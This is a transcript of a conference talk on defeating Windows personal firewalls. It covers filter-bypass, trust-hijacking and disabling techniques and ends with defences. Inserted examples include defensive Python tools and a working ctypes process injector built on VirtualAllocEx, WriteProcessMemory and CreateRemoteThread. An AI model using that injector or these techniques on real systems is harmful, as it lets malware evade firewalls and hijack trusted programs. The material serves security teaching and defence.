Defeating Windows Personal Firewalls - PowerPoint PPT Presentation
Transcript and Presenter's Notes (60 slides)

1
Defeating Windows Personal Firewalls
Chris Ries, Security Research Engineer, VigilantMinds Inc.
2
What I Do
  • Vulnerability Research
  • Discovery, Exploitation, Remediation
  • Malware Analysis
  • Rootkits, Stealth Malware
  • Security Software Evaluation

3
Background
  • Attacks against personal firewalls have been
    around for a while
  • Circumvent, disable, or abuse filtering
  • Many personal firewalls are still susceptible to
    a variety of attacks
  • These attacks are becoming common in everyday
    malware

4
Topics
  • Intro to Personal Firewalls
  • Uses, configuration, management, etc.
  • Network Filtering with Windows
  • Attacking Personal Firewalls
  • Stealth Malware
  • Improving Security of Personal Firewalls

5
Intro to Personal Firewalls
6
Value of Personal Firewalls
  • Acts like network firewall
  • Additional granularity of per application
    filtering
  • Additional knowledge of system
  • Complements anti-virus
  • More behavior-based, better for unknown malware
  • Can be used to enforce acceptable use policies
  • P2P
  • Chat

7
Downsides
  • Scalability issues
  • Usability / Management issues
  • Can be noisy
  • Configuration can be painful
  • Some can be easily defeated (more on this later)

8
Inbound Protection
  • Also available from firewall built into Windows
  • Block access to ports that may need to be
    listening
  • MS Ports
  • ActiveSync
  • Stealth capabilities
  • Limit impact of compromise
  • Backdoors not reachable

9
Outbound Protection
  • Minimize impact of malware infections
  • Protect against malware that gets by AV
  • Prevent worms from propagating
  • Spyware / adware may not be able to transmit
    stolen information
  • Reverse-connect shells not reachable
  • Alerts / Logs can identify infected hosts

10
Application Fingerprinting
  • Many personal firewalls keep track of
    applications using fingerprints
  • Allows firewall to uniquely identify trusted
    applications
  • Firewall can alert on any changes made to them

11
Caveats
  • Code injected into trusted process hijacks the
    process network capabilities, so personal
    firewall cannot always limit impact of
    exploitation.
  • Ex. Code injected from exploitation of browser
    vulnerability can connect out on port 80.

12
Centralized Management
  • Policy Management
  • Generic groups for workstations, laptops, web
    servers, etc.
  • Changes can be made to individual policies via
    central console
  • User cannot override policy or disable firewall
  • Logging
  • Logs can be aggregated centrally
  • Automated analysis can be performed to identify
    security incidents

13
Policies
  • Need default deny rule
  • Create rules at multiple levels
  • Application level
  • Network level
  • Different policies for different interfaces or
    locations

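The following is an added example, not code from the presentation or from any firewall product, showing how slides 10 and 13 fit together: trusted applications are identified by a fingerprint (assumed here to be a SHA-256 of the executable on disk), rules exist both at the application level and at the network level, the network-level rule depends on the interface, and anything not explicitly allowed is denied. The file names, ports, interface labels ("lan", "wifi") and the rule layout are this example's own assumptions.

```python
"""Per-application, default-deny policy keyed on executable fingerprints.

Added example for slides 10 (application fingerprinting) and 13 (policies);
not code from the presentation or from any firewall product. The rule
layout, the SHA-256 choice and the interface labels are assumptions.
"""
import hashlib
import tempfile
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, FrozenSet, List, Optional, Set


def fingerprint(path: Path) -> Optional[str]:
    """SHA-256 of the executable on disk; None if it no longer exists."""
    if not path.is_file():
        return None
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


@dataclass(frozen=True)
class Connection:
    app_path: Path
    direction: str      # "out" or "in"
    remote_port: int
    interface: str      # "lan", "wifi", ... (assumed interface labels)


@dataclass
class AppRule:
    sha256: str                      # recorded when the user trusted the app
    out_ports: FrozenSet[int]        # allowed remote ports, outbound
    in_ports: FrozenSet[int] = frozenset()


@dataclass
class Policy:
    apps: Dict[Path, AppRule]
    net_block: Dict[str, Set[int]]   # network-level rule: interface -> blocked ports
    alerts: List[str] = field(default_factory=list)

    def decide(self, c: Connection) -> str:
        # Network-level rules apply to every application, trusted or not.
        if c.remote_port in self.net_block.get(c.interface, set()):
            return "deny"
        rule = self.apps.get(c.app_path)
        if rule is None:
            return "deny"                       # default deny: no rule for this app
        if fingerprint(c.app_path) != rule.sha256:
            # Binary changed or vanished since it was trusted: alert, then deny.
            self.alerts.append(f"fingerprint mismatch: {c.app_path.name}")
            return "deny"
        allowed = rule.out_ports if c.direction == "out" else rule.in_ports
        return "allow" if c.remote_port in allowed else "deny"


def run_demo(workdir: Optional[Path] = None) -> Dict[str, object]:
    """Constructed scenario: trust a fake browser and backup client, query the
    policy, then overwrite the browser the way a dropper would."""
    if workdir is None:
        workdir = Path(tempfile.mkdtemp())
    browser = workdir / "browser.exe"
    backup = workdir / "backup.exe"
    browser.write_bytes(b"MZ original browser image")   # stand-in for a real PE
    backup.write_bytes(b"MZ backup client image")
    policy = Policy(
        apps={
            browser: AppRule(fingerprint(browser), frozenset({80, 443})),
            backup: AppRule(fingerprint(backup), frozenset({445})),
        },
        net_block={"wifi": {139, 445}},      # no SMB on untrusted networks
    )
    web = Connection(browser, "out", 443, "wifi")
    results = {
        "browser_https": policy.decide(web),
        "browser_irc": policy.decide(Connection(browser, "out", 6667, "wifi")),
        "backup_smb_lan": policy.decide(Connection(backup, "out", 445, "lan")),
        "backup_smb_wifi": policy.decide(Connection(backup, "out", 445, "wifi")),
        "unknown_app": policy.decide(Connection(workdir / "dropper.exe", "out", 80, "lan")),
    }
    browser.write_bytes(b"MZ trojanized browser image")  # attacker replaces the trusted binary
    results["browser_https_after_tamper"] = policy.decide(web)
    results["alerts"] = list(policy.alerts)
    return results


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k}: {v}")
```

Note the limit slide 11 points at: the fingerprint only covers the image on disk. Overwriting browser.exe is caught, but code injected into the running, already-verified process inherits its "allow 80/443" rule without changing anything this check can see.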
14
Network Filtering with Windows
15
Tour of Windows Networking (stack diagram, top to bottom)
  Networking Applications
  Networking API (interface / implementation)
  TDI
  Network Protocol
  NDIS (interface / driver)
  HAL
  NIC
16
NDIS
  • Network Driver Interface Specification
  • Standard interface that higher level protocols
    can use to communicate with NICs
  • Communicates with NIC via the Hardware
    Abstraction Layer

17
Network Protocol Layer
  • Network and Transport layer protocols
  • Ex. TCPIP.SYS
  • Communicates with NDIS below it
  • Higher layers communicate with TCPIP.SYS via the
    TDI interface

18
TDI
  • Transport Driver Interface (some also say
    Transport Device Interface, or Transport Data
    Interface)
  • Allows higher levels to remain independent of
    transport-layer protocols
  • Unlike NDIS, no driver for TDI

19
Network API / Sockets
  • TDI client (communicates with TDI layer below it)
  • Provides Application Programming Interface (API)
    for user-mode applications to use (Ex. Winsock
    API)
  • Part of it implemented in kernel, part in
    user-mode
  • This level can be further split up into many
    sub-levels (Winsock, RPC, Named Pipes, etc. all
    different)

20
Tour of Windows Networking (example path, top to bottom)
  Web browser
  Winsock API / Winsock
  TDI / TCPIP.SYS
  NDIS / NDIS.SYS
  HAL
  NIC
21
Filtering Techniques
  • Filtering can be performed at a variety of places
  • Higher levels
  • More application info
  • Lower levels
  • Less stack exposure
  • More packet information

22
NDIS Filtering
  • Pros
  • Access to lots of packet information
  • Not much of the stack is exposed to traffic
  • Cons
  • Tasks such as re-assembly may not have occurred
    yet
  • Not easy to associate traffic with applications

23
NDIS Filtering Techniques
  • Intermediate (IM) Driver
  • Installed into NDIS Layer
  • NDIS-hooking filter driver
  • Hooks NDIS wrapper functions

24
Network Protocol Filtering
  • Pros
  • Many mechanisms for filtering built into
    TCPIP.SYS
  • Cons
  • Filtering will not apply to other protocol drivers

25
Network Protocol Filtering Techniques
  • Filter-hook driver
  • Driver implements a function to determine whether
    to pass, modify, or drop packet
  • Only one can be installed at a time
  • Routing and Remote Access (RRAS) Packet Filtering
    API
  • Can be accessed from user-mode
  • Can only filter on limited information
  • Firewall-hook drivers
  • More than one can be installed at same time
  • Windows XP Firewall is implemented as
    firewall-hook driver (ipnat.sys)

26
TDI Filtering
  • TDI Filter driver sits between TDI clients (ex.
    Winsock) and TDI provider (ex. TCPIP.SYS)
  • Pros: More application-level info available
  • Cons: Not much packet information available, most
    of stack is exposed to network traffic

27
Network API Filtering
  • Different filtering methods available from
    different APIs
  • Can also hook into kernel-mode code
  • Pros: Very close to applications, good for
    inspecting higher-layer protocols
  • Cons: Very little packet information available,
    filtering will not apply to other APIs

28
Winsock Service Provider Interface (SPI)
  • Winsock SPI can be used to create
  • Base protocols
  • Layered Service Providers (LSPs)
  • Filtering LSP above TCP/IP base protocol can
    perform web filtering, e-mail filtering, etc.

29
Note on Vista
  • Packet filtering methods are different in Vista
  • Windows Filtering Platform (WFP) architecture can be
    used to plug filter drivers into various layers
    of the stack
  • Basic filtering can be performed with Vista APIs,
    more thorough filtering can be accomplished with
    callout drivers.
  • See http://www.microsoft.com/whdc/device/network/WFP.mspx

30
Firewall Attacks
31
Firewall Attacks
  • Circumventing filtering
  • Disabling protection
  • Malicious uses for filtering

32
Firewall Attacks
  • Most are local attacks that would be used after
    compromise/infection
  • We will not focus on method of infection /
    compromise here, but could be
  • Inbound network worm over open port
  • Client-side attack (web, e-mail, etc.)
  • Inside attack

33
Firewall Attacks
  • Many of these techniques are complementary to
    rootkits / stealth malware
  • Can be used to provide hidden backdoor access to
    compromised hosts
  • Firewall may appear to be functioning properly
    even when it is being bypassed

34
Subverting Filtering
  • Communicate directly with layer below Filtering
    Parallel Stack
  • Examples
  • Network Protocol driver to bypass TDI filtering
  • NDIS-layer driver to bypass network protocol
    filtering

35
Subverting Filtering
(diagram: TDI-level filtering bypassed by a parallel protocol driver)
  Networking Applications
  Networking API
  TDI  <-- Filtering
  Network Protocol Driver: TCPIP.SYS  |  BACKDOOR (own protocol driver, talks to NDIS directly)
  NDIS
  HAL
  NIC
36
Subverting Filtering
(diagram: protocol-level filtering bypassed by an NDIS-layer driver)
  Networking Applications
  Networking API
  TDI
  TCPIP.SYS  <-- Filtering
  NDIS: NDIS IM driver or filter hooks  |  BACKDOOR (NDIS-layer driver, below the protocol filter)
  HAL
  NIC
37
Subverting Filtering
  • Even lower?
  • Hardware Abstraction Layer (HAL)
  • NIC Firmware
  • SubVirt

SubVirt (diagram, top to bottom)
  Malicious Service  |  Original Operating System
  Rootkit Virtual Machine
  Hardware
38
Hijacking Trust
  • Launch the application
  • Process Injection
  • Inter-process communication (IPC)
  • Plugins
  • Browser Helper Objects

39
Process Injection
  • Used by malware for stealth purposes
  • No suspicious process running
  • Used by user-mode rootkits to install hooks into
    every running process
  • Hooks hide files, registry keys, and other
    resources from the process

40
Process Injection How It Works
  • Malicious process injects code into target
    process
  • VirtualAllocEx() and WriteProcessMemory()
  • Malicious process runs injected code in target
    process
  • CreateRemoteThread()
  • SetThreadContext()
  • Injected code has network privileges of target
    process

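The API sequence on this slide, as an added example written for this page (not code from the presentation). It is a ctypes port of the classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread injector; it only runs on Windows, and `payload` must be position-independent code supplied by the caller (none is included). The `k32` parameter, the `bind()` helper and the dry-run stand-in are this example's own additions; the part worth studying is the prototype declarations, since ctypes defaults every return value to a 32-bit int, which truncates HANDLEs and remote addresses on 64-bit Windows.

```python
"""Process injection with the slide-40 API sequence, via ctypes.

Added example; not code from the presentation. Runs only on Windows and
expects `payload` to be position-independent code for the target's
bitness. The `k32` parameter lets the call sequence be dry-run against a
stand-in object off Windows.
"""
import ctypes
import sys

# Win32 constants (winnt.h / memoryapi.h)
PROCESS_ALL_ACCESS = 0x001F0FFF
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x40

# Win32 type aliases that are correct on both 32- and 64-bit builds
HANDLE = ctypes.c_void_p
LPVOID = ctypes.c_void_p
DWORD = ctypes.c_uint32
BOOL = ctypes.c_int
SIZE_T = ctypes.c_size_t


def bind(k32):
    """Declare prototypes for the five calls the injector uses. Without the
    restype declarations ctypes returns 32-bit ints and pointers get cut."""
    k32.OpenProcess.argtypes = [DWORD, BOOL, DWORD]
    k32.OpenProcess.restype = HANDLE
    k32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, SIZE_T, DWORD, DWORD]
    k32.VirtualAllocEx.restype = LPVOID
    k32.WriteProcessMemory.argtypes = [HANDLE, LPVOID, LPVOID, SIZE_T, ctypes.POINTER(SIZE_T)]
    k32.WriteProcessMemory.restype = BOOL
    k32.CreateRemoteThread.argtypes = [HANDLE, LPVOID, SIZE_T, LPVOID, LPVOID, DWORD, ctypes.POINTER(DWORD)]
    k32.CreateRemoteThread.restype = HANDLE
    k32.CloseHandle.argtypes = [HANDLE]
    k32.CloseHandle.restype = BOOL
    return k32


def _fail(what: str):
    # ctypes.get_last_error only exists on Windows builds of ctypes
    code = ctypes.get_last_error() if sys.platform == "win32" else 0
    raise OSError(code, f"{what} failed")


def inject(pid: int, payload: bytes, k32=None) -> int:
    """Allocate RWX memory in `pid`, copy `payload` there and start a thread
    at its first byte. Returns the remote address."""
    if k32 is None:
        if sys.platform != "win32":
            raise RuntimeError("Win32 API injection only runs on Windows")
        k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    bind(k32)

    h_proc = k32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    if not h_proc:
        _fail("OpenProcess")
    try:
        remote = k32.VirtualAllocEx(h_proc, None, len(payload),
                                    MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
        if not remote:
            _fail("VirtualAllocEx")
        written = SIZE_T(0)
        ok = k32.WriteProcessMemory(h_proc, remote, payload, len(payload), ctypes.byref(written))
        if not ok or written.value != len(payload):
            _fail("WriteProcessMemory")      # a short write is a failure, not a success
        # The new thread starts executing at `remote`, inside the target,
        # so whatever it does on the network carries the target's identity.
        h_thread = k32.CreateRemoteThread(h_proc, None, 0, remote, None, 0, None)
        if not h_thread:
            _fail("CreateRemoteThread")
        k32.CloseHandle(h_thread)
        return remote
    finally:
        k32.CloseHandle(h_proc)
```

This is exactly the caveat from slide 11: the firewall's per-application rule was written for the target executable, and the thread created here runs under that rule.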
41
Disabling Protection
  • Kill processes that belong to security software
  • Remove registry keys that belong to security
    software
  • Delete, overwrite, or modify files that belong to
    security software
  • Executables, policy and configuration files

42
Disabling Protection
  • Unload, uninstall, delete kernel drivers
  • Remove kernel hooks
  • Filter hooks
  • Other hooks used for registry protection, process
    injection protection, etc.

43
Abusing Filtering
  • Block access to update sites (Microsoft updates,
    AV updates, etc.)
  • Edit hosts file (traditional method)
  • Add packet filter
  • Fantibag trojan used RRAS packet filtering API to
    block access to AV sites

44
Malicious LSPs
  • Steal information
  • Usernames, passwords
  • Banking information
  • Modify or block traffic
  • Can be installed in a specific location of the chain

LSP chain (diagram, top to bottom)
  Web browser
  Winsock API
  Malicious LSP
  LSP
  Base Protocol
45
Stealth Malware
46
Kernel-mode Backdoors
  • eEye BootRoot
  • Boot sector rootkit
  • Hooks NDIS.SYS when driver is loaded
  • Hooks look at incoming packets for code to run
  • Some other rootkits implement a backdoor in a
    network protocol driver

47
Process Injecting Malware
  • W32.Esbot.A, W32.Randex.E, Trojan.Mitglieder.E,
    W32.Nimda.A@mm, W32.Bofra.C@mm, W32.Beagle.C@mm,
    W32.Beagle.G@mm, Backdoor.Beasty.Hmm,
    W32.HLLW.Lovgate.O@mm, W32.Bobax.D,
    W32.Wullik@mm, Infostealer.Wowcraft,
    Downloader.SmallWeb, Spyware.Look2Me,
  • Hacker Defender
  • Turns every listening socket into a backdoor
    using a combination of process injection and hook
    insertion

48
Malicious LSPs
  • Very common for adware / spyware
  • Steal sensitive information
  • Track web browsing habits, etc.
  • http://www.castlecops.com/LSPs.html for a long
    list

49
TROJ_RILER.B dropped by PowerPoint 0day
50
Finding and Removing LSPs
  • HijackThis
  • LSPFix
  • LSP Explorer

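An added example for slides 44, 48 and 50 (not code from the presentation, nor from HijackThis, LSPFix or LSP Explorer): a small audit of the Winsock catalog as printed by `netsh winsock show catalog`. It flags every layered entry and raises the severity when the provider DLL lives somewhere a user can write. SAMPLE is a constructed dump trimmed to the fields used here; the MSAFD entry is modelled on what Windows prints, while "Corp Web Filter" and "Network Helper" are invented, as are their GUIDs and paths.

```python
"""Audit a Winsock catalog dump for layered service providers.

Added example for slides 44, 48 and 50; not the presentation's code and
not any of the tools it names. SAMPLE is constructed: the MSAFD entry is
modelled on real netsh output, the other entries are invented.
"""
import re
from typing import Dict, List, Tuple

SAMPLE = r"""
Winsock Catalog Provider Entry
------------------------------------------------------
Entry Type:                         Base Service Provider
Description:                        MSAFD Tcpip [TCP/IP]
Provider ID:                        {E70F1AA0-AB8B-11CF-8CA3-00805F48A192}
Provider Path:                      %SystemRoot%\system32\mswsock.dll
Catalog Entry ID:                   1001
Protocol Chain Length:              1

Winsock Catalog Provider Entry
------------------------------------------------------
Entry Type:                         Layered Service Provider
Description:                        Corp Web Filter
Provider ID:                        {11111111-2222-3333-4444-555555555555}
Provider Path:                      C:\Program Files\CorpFilter\cfilter.dll
Catalog Entry ID:                   1030
Protocol Chain Length:              0

Winsock Catalog Provider Entry
------------------------------------------------------
Entry Type:                         Layered Chain Entry
Description:                        Corp Web Filter over [MSAFD Tcpip [TCP/IP]]
Provider ID:                        {11111111-2222-3333-4444-555555555555}
Provider Path:                      C:\Program Files\CorpFilter\cfilter.dll
Catalog Entry ID:                   1031
Protocol Chain Length:              2

Winsock Catalog Provider Entry
------------------------------------------------------
Entry Type:                         Layered Service Provider
Description:                        Network Helper
Provider ID:                        {66666666-7777-8888-9999-AAAAAAAAAAAA}
Provider Path:                      C:\Users\alice\AppData\Local\Temp\nethlp.dll
Catalog Entry ID:                   1040
Protocol Chain Length:              0
"""

FIELD = re.compile(r"^(.+?):\s{2,}(.*)$")
# Locations an unprivileged user (or the malware it ran) can write to.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")


def parse_catalog(text: str) -> List[Dict[str, str]]:
    """Split the netsh dump into one dict of 'Field: value' pairs per entry."""
    entries: List[Dict[str, str]] = []
    current = None
    for line in text.splitlines():
        if line.startswith("Winsock Catalog Provider Entry"):
            current = {}
            entries.append(current)
            continue
        m = FIELD.match(line)
        if m and current is not None:
            current[m.group(1).strip()] = m.group(2).strip()
    return entries


def audit(text: str) -> List[Tuple[str, str, str]]:
    """Return (severity, description, reason) for every layered entry."""
    findings = []
    for e in parse_catalog(text):
        kind = e.get("Entry Type", "")
        raw_path = e.get("Provider Path", "")
        path = raw_path.lower()
        desc = e.get("Description", "?")
        if "Layered" not in kind:
            continue        # base providers are the normal floor of the catalog
        in_system = (path.startswith("%systemroot%\\system32\\")
                     or "\\windows\\system32\\" in path)
        if any(tag in path for tag in USER_WRITABLE):
            findings.append(("high", desc, f"layered provider loaded from user-writable path {raw_path}"))
        elif not in_system:
            findings.append(("review", desc, f"layered provider outside the system directory: {raw_path}"))
        else:
            findings.append(("info", desc, "layered provider in system directory"))
    return findings


if __name__ == "__main__":
    for severity, desc, reason in audit(SAMPLE):
        print(f"[{severity}] {desc}: {reason}")
```

On a live host, `netsh winsock show catalog > catalog.txt` and feed the file to `audit()`. A legitimate corporate filter and a malicious LSP look alike at this level, so the "review" findings need a human; a DLL under a user's Temp directory does not. Removing an entry by hand means rewriting the chain entries that reference it, which is why the tools on this slide exist; `netsh winsock reset` is the blunt alternative, and it drops every LSP, legitimate ones included, and needs a reboot.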
51
Improving Security
52
Better Personal Firewalls
  • Low-level filtering
  • Application Protection
  • Self-defense
  • Hooks, drivers, files, registry keys

53
Low-level Filtering
  • Filter at lowest possible level to prevent
    subversion attacks
  • Filter at multiple levels
  • Defense in depth
  • More information about activity

54
Application Protection
  • Monitor
  • Creation of new processes
  • Calls to functions used for process injection
  • IPC
  • Executable fingerprinting
  • Watch for changes to applications and libraries

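The monitoring this slide calls for, as an added example (not the presentation's code and tied to no product): a detector that walks a constructed, key=value event log of process starts, remote thread creation and outbound connections, and reports the three ways the trust of a firewall-allowed application gets hijacked (slides 38 and 40): an unexpected parent launching it, a remote thread injected into it, and the traffic it sends once it is tainted. The log format, paths, pids, the TEST-NET address 203.0.113.5 and the benign-injector allow-list are all assumptions of the example.

```python
"""Detect trust hijacking (slides 38, 40, 54) from host event lines.

Added example; not the presentation's code. LOG is a constructed event
stream in an invented key=value format; images, pids and the lists below
are example assumptions, not a recommended baseline.
"""
import re
from typing import Dict, List, Tuple

# Applications the firewall trusts for outbound traffic (from its policy).
TRUSTED = {r"c:\program files\browser\browser.exe"}
# Parents that legitimately start user applications.
EXPECTED_PARENTS = {r"c:\windows\explorer.exe"}
# Sources that create remote threads in normal operation (tuning assumption).
BENIGN_INJECTORS = {r"c:\windows\system32\csrss.exe"}

LOG = r"""
2006-04-10T09:12:01 event=ProcessStart pid=1200 image=C:\Program Files\Browser\browser.exe parent_pid=800 parent_image=C:\Windows\explorer.exe
2006-04-10T09:12:05 event=RemoteThread src_pid=3344 src_image=C:\Users\alice\AppData\Local\Temp\updat3r.exe dst_pid=1200 dst_image=C:\Program Files\Browser\browser.exe
2006-04-10T09:12:06 event=Connect pid=1200 image=C:\Program Files\Browser\browser.exe dst=203.0.113.5 port=80 decision=allow
2006-04-10T09:12:40 event=RemoteThread src_pid=560 src_image=C:\Windows\System32\csrss.exe dst_pid=1200 dst_image=C:\Program Files\Browser\browser.exe
2006-04-10T09:13:10 event=ProcessStart pid=1250 image=C:\Program Files\Browser\browser.exe parent_pid=3344 parent_image=C:\Users\alice\AppData\Local\Temp\updat3r.exe
2006-04-10T09:13:11 event=Connect pid=1250 image=C:\Program Files\Browser\browser.exe dst=203.0.113.5 port=443 decision=allow
"""

# key=value pairs whose values may contain spaces (paths): a value runs
# until the next " key=" or the end of the line.
KV = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_line(line: str) -> Dict[str, str]:
    ts, _, rest = line.partition(" ")
    fields = {k: v for k, v in KV.findall(rest)}
    fields["ts"] = ts
    return fields


def analyze(log: str) -> List[Tuple[str, str, str]]:
    """Return (timestamp, finding, detail) tuples in log order."""
    tainted: Dict[str, str] = {}      # pid -> why its trust is suspect
    findings: List[Tuple[str, str, str]] = []
    for raw in log.strip().splitlines():
        e = parse_line(raw)
        kind = e["event"]
        if kind == "ProcessStart" and e["image"].lower() in TRUSTED:
            # Slide 38: "launch the application" from something untrusted.
            if e["parent_image"].lower() not in EXPECTED_PARENTS:
                tainted[e["pid"]] = f"launched by {e['parent_image']}"
                findings.append((e["ts"], "launch_hijack", f"pid {e['pid']} {tainted[e['pid']]}"))
        elif kind == "RemoteThread" and e["dst_image"].lower() in TRUSTED:
            # Slide 40: a thread started in the trusted process by someone else.
            src = e["src_image"].lower()
            if src != e["dst_image"].lower() and src not in BENIGN_INJECTORS:
                tainted[e["dst_pid"]] = f"remote thread from {e['src_image']}"
                findings.append((e["ts"], "injection", f"pid {e['dst_pid']} {tainted[e['dst_pid']]}"))
        elif kind == "Connect" and e["pid"] in tainted:
            # The firewall allowed this (slide 11); the monitor can still see it.
            findings.append((e["ts"], "tainted_connect",
                             f"pid {e['pid']} ({tainted[e['pid']]}) reached "
                             f"{e['dst']}:{e['port']}, firewall said {e['decision']}"))
    return findings


if __name__ == "__main__":
    for ts, kind, detail in analyze(LOG):
        print(ts, kind, detail)
```

The allow-list for remote-thread sources is the part that needs care in practice: it should be short, explicit and reviewed, because an attacker who can inject into a listed source gets the same free pass the firewall already gives the target.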
55
How To Test
  • Tools have been created to test for many of these
    weaknesses
  • http://www.firewallleaktester.com
  • See my paper "Defeating Windows Personal
    Firewalls" for more details on testing:
    http://www.vigilantminds.com/files/defeating_windows_personal_firewalls.pdf

56
Supplementary Tools
  • Address weaknesses in specific firewalls with
    supplementary tools
  • ProcessGuard
  • AppDefend
  • Antihook
  • Prevx

57
More Complete Security Software
  • Host Intrusion Prevention Systems (HIPS)
  • Network filtering
  • Registry Protection
  • Filesystem Protection
  • Application-level Protection
  • Operating system Protection
  • Kernel, drivers, etc.
  • Self-defense
  • Cisco CSA, McAfee Entercept, eEye Blink, etc.

58
Best Practices
  • Harden systems
  • Use limited privilege accounts
  • User education
  • Periodic testing and auditing

59
Conclusions
  • Personal Firewalls can be very useful for
    preventing and limiting the impact of compromises
    and infections
  • There are a number of attacks that can be used to
    bypass, disable, or abuse the filtering
    capabilities of firewalls
  • Better firewalls, supplementary tools, and
    general best practices can help to defend
    against these attacks

60
Thank You! Questions? Comments?
Contact Info: 412-661-5700 x258, Chris.Ries@vigilantminds.com